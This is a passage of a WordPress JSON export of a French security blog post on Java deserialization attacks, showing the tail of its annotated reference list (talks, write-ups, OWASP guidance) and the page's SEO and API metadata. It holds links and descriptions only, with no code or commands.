href=\"https:\/\/blog.netspi.com\/java-deserialization-attacks-burp\/\">https:\/\/blog.netspi.com\/java-deserialization-attacks-burp\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Comprehensive article explaining Java deserialization and listing several dedicated tools<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/nickbloor.co.uk\/2017\/08\/13\/attacking-java-deserialization\/\">https:\/\/nickbloor.co.uk\/2017\/08\/13\/attacking-java-deserialization\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Recommendations on the use of deserialization for various languages<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md\">https:\/\/github.com\/OWASP\/CheatSheetSeries\/blob\/master\/cheatsheets\/Deserialization_Cheat_Sheet.md<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Slides of an Insomnia talk on deserialization in several languages, given at OWASP New Zealand Day 2016<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/insomniasec.com\/cdn-assets\/Deserialization_-__What_Could_Go_Wrong.pdf\">https:\/\/insomniasec.com\/cdn-assets\/Deserialization_-__What_Could_Go_Wrong.pdf<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Exploiting Java deserialization vulnerabilities in hardened environments (firewalled systems, up-to-date Java)<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/deadcode.me\/blog\/2016\/09\/02\/Blind-Java-Deserialization-Commons-Gadgets.html\">https:\/\/deadcode.me\/blog\/2016\/09\/02\/Blind-Java-Deserialization-Commons-Gadgets.html<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Exploiting blind Java deserialization with Burp and ysoserial<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/www.n00py.io\/2017\/11\/exploiting-blind-java-deserialization-with-burp-and-ysoserial\/\">https:\/\/www.n00py.io\/2017\/11\/exploiting-blind-java-deserialization-with-burp-and-ysoserial\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Write-up of the WebGoat 8 (the OWASP training application) insecure deserialization challenge<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/medium.com\/abn-amro-red-team\/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef\">https:\/\/medium.com\/abn-amro-red-team\/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article by a Tenable reverse engineer analysing CVE-2016-3737 and writing gadgets for Jython<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/fr.tenable.com\/blog\/expanding-on-a-known-vulnerability-attacking-with-jython\">https:\/\/fr.tenable.com\/blog\/expanding-on-a-known-vulnerability-attacking-with-jython<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Java tutorial on implementing a serializable class<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"http:\/\/www.javapractices.com\/topic\/TopicAction.do?Id=45\">http:\/\/www.javapractices.com\/topic\/TopicAction.do?Id=45<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Slides of a talk by Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711) at OWASP AppSecEU 2016 on JVM deserialization vulnerabilities and how to defend against them<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/fr.slideshare.net\/cschneider4711\/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016\">https:\/\/fr.slideshare.net\/cschneider4711\/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Slides of a talk by Chris Frohoff (@frohoff) and Gabriel Lawrence (@gebl) at OWASP San Diego on Java deserialization<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a 
href=\"https:\/\/www.slideshare.net\/frohoff1\/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization\">https:\/\/www.slideshare.net\/frohoff1\/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Analyse de l\u2019attaque d\u2019Equifax (143 millions de clients touch\u00e9s aux USA) en 2017 par @brandur, reposant sur le cha\u00eenage de gadgets<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/brandur.org\/fragments\/gadgets-and-chains\">https:\/\/brandur.org\/fragments\/gadgets-and-chains<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Support d\u2019un talk de Matthias Kaiser (@matthias_kaiser) \u00e0 la HackPra WS 2015 sur l\u2019exploitation de vuln\u00e9rabilit\u00e9s de d\u00e9s\u00e9rialisation non-s\u00e9curis\u00e9e<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/fr.slideshare.net\/codewhitesec\/exploiting-deserialization-vulnerabilities-in-java-54707478\">https:\/\/fr.slideshare.net\/codewhitesec\/exploiting-deserialization-vulnerabilities-in-java-54707478<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article de Ian Haken sur la d\u00e9couverte automatis\u00e9e de cha\u00eenes de gadgets, notamment avec Gadget Inspector<\/div>\n<div style=\"text-align: justify;\">\n<ul>\n<li><a href=\"https:\/\/i.blackhat.com\/us-18\/Thu-August-9\/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains-wp.pdf\">https:\/\/i.blackhat.com\/us-18\/Thu-August-9\/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains-wp.pdf<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\">Article de @breenmachine de 2015 sur la d\u00e9s\u00e9rialisation Java dans plusieurs technologies du march\u00e9 et d\u00e9tail de 5 exploits (websphere, jboss, jenkins, weblogic et openNMS)<\/div>\n<div style=\"text-align: 
justify;\">\n<ul>\n<li><a href=\"https:\/\/foxglovesecurity.com\/2015\/11\/06\/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\/\">https:\/\/foxglovesecurity.com\/2015\/11\/06\/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability\/<\/a><\/li>\n<\/ul>\n<\/div>\n<div style=\"text-align: justify;\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Introduction La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications. &nbsp; Exemple de s\u00e9rialisation d&#8217;une variable&#8230;<\/p>\n","protected":false},"author":1418,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"page-templates\/tmpl-one.php","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[36,3225],"tags":[3899,1069,3901,3900],"coauthors":[3902],"class_list":["post-15728","post","type-post","status-publish","format-standard","hentry","category-cybersecurity-digital-trust","category-ethical-hacking-indicent-response","tag-java","tag-outil","tag-rce","tag-serialisation"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight<\/title>\n<meta name=\"description\" content=\"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. 
Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight\" \/>\n<meta property=\"og:description\" content=\"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\" \/>\n<meta property=\"og:site_name\" content=\"RiskInsight\" \/>\n<meta property=\"article:published_time\" content=\"2019-07-10T09:00:29+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-07-07T15:15:02+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\" \/>\n<meta name=\"author\" content=\"Bilal Benseddiq\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Bilal Benseddiq\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"21 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\"},\"author\":{\"name\":\"Bilal Benseddiq\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6\"},\"headline\":\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)\",\"datePublished\":\"2019-07-10T09:00:29+00:00\",\"dateModified\":\"2021-07-07T15:15:02+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\"},\"wordCount\":4280,\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\",\"keywords\":[\"java\",\"outil\",\"RCE\",\"s\u00e9rialisation\"],\"articleSection\":[\"Cybersecurity &amp; Digital Trust\",\"Ethical Hacking &amp; Incident Response\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\",\"name\":\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - 
RiskInsight\",\"isPartOf\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\",\"datePublished\":\"2019-07-10T09:00:29+00:00\",\"dateModified\":\"2021-07-07T15:15:02+00:00\",\"description\":\"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation 
(Java)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#website\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"name\":\"RiskInsight\",\"description\":\"The cybersecurity &amp; digital trust blog by Wavestone&#039;s consultants\",\"publisher\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#organization\",\"name\":\"Wavestone\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"contentUrl\":\"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png\",\"width\":50,\"height\":50,\"caption\":\"Wavestone\"},\"image\":{\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6\",\"name\":\"Bilal Benseddiq\",\"url\":\"https:\/\/www.riskinsight-wavestone.com\/en\/author\/bilal-benseddiq\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight","description":"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","og_locale":"en_US","og_type":"article","og_title":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - RiskInsight","og_description":"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.","og_url":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","og_site_name":"RiskInsight","article_published_time":"2019-07-10T09:00:29+00:00","article_modified_time":"2021-07-07T15:15:02+00:00","og_image":[{"url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","type":"","width":"","height":""}],"author":"Bilal Benseddiq","twitter_misc":{"Written by":"Bilal Benseddiq","Est. 
reading time":"21 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#article","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/"},"author":{"name":"Bilal Benseddiq","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6"},"headline":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java)","datePublished":"2019-07-10T09:00:29+00:00","dateModified":"2021-07-07T15:15:02+00:00","mainEntityOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/"},"wordCount":4280,"publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","keywords":["java","outil","RCE","s\u00e9rialisation"],"articleSection":["Cybersecurity &amp; Digital Trust","Ethical Hacking &amp; Incident Response"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","url":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/","name":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation (Java) - 
RiskInsight","isPartOf":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage"},"thumbnailUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","datePublished":"2019-07-10T09:00:29+00:00","dateModified":"2021-07-07T15:15:02+00:00","description":"La s\u00e9rialisation consiste \u00e0 transformer un objet applicatif en un format de donn\u00e9es pouvant \u00eatre restaur\u00e9 ult\u00e9rieurement. Ce proc\u00e9d\u00e9 est utilis\u00e9 pour sauvegarder des objets ou les envoyer dans le cadre de communications.","breadcrumb":{"@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#primaryimage","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2019\/10\/I1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.riskinsight-wavestone.com\/2019\/07\/techniques-outils-deserialisation-java\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.riskinsight-wavestone.com\/en\/"},{"@type":"ListItem","position":2,"name":"Techniques et outils d\u2019attaque sur les moteurs de d\u00e9s\u00e9rialisation 
(Java)"}]},{"@type":"WebSite","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#website","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","name":"RiskInsight","description":"The cybersecurity &amp; digital trust blog by Wavestone&#039;s consultants","publisher":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.riskinsight-wavestone.com\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#organization","name":"Wavestone","url":"https:\/\/www.riskinsight-wavestone.com\/en\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/","url":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","contentUrl":"https:\/\/www.riskinsight-wavestone.com\/wp-content\/uploads\/2021\/08\/Monogramme\u2013W\u2013NEGA-RGB-50x50-1.png","width":50,"height":50,"caption":"Wavestone"},"image":{"@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.riskinsight-wavestone.com\/en\/#\/schema\/person\/66dda0a265d60d65e7a8a3e373ccd8b6","name":"Bilal 
Benseddiq","url":"https:\/\/www.riskinsight-wavestone.com\/en\/author\/bilal-benseddiq\/"}]}},"_links":{"self":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/15728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/users\/1418"}],"replies":[{"embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/comments?post=15728"}],"version-history":[{"count":6,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/15728\/revisions"}],"predecessor-version":[{"id":19741,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/posts\/15728\/revisions\/19741"}],"wp:attachment":[{"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/media?parent=15728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/categories?post=15728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/tags?post=15728"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.riskinsight-wavestone.com\/en\/wp-json\/wp\/v2\/coauthors?post=15728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}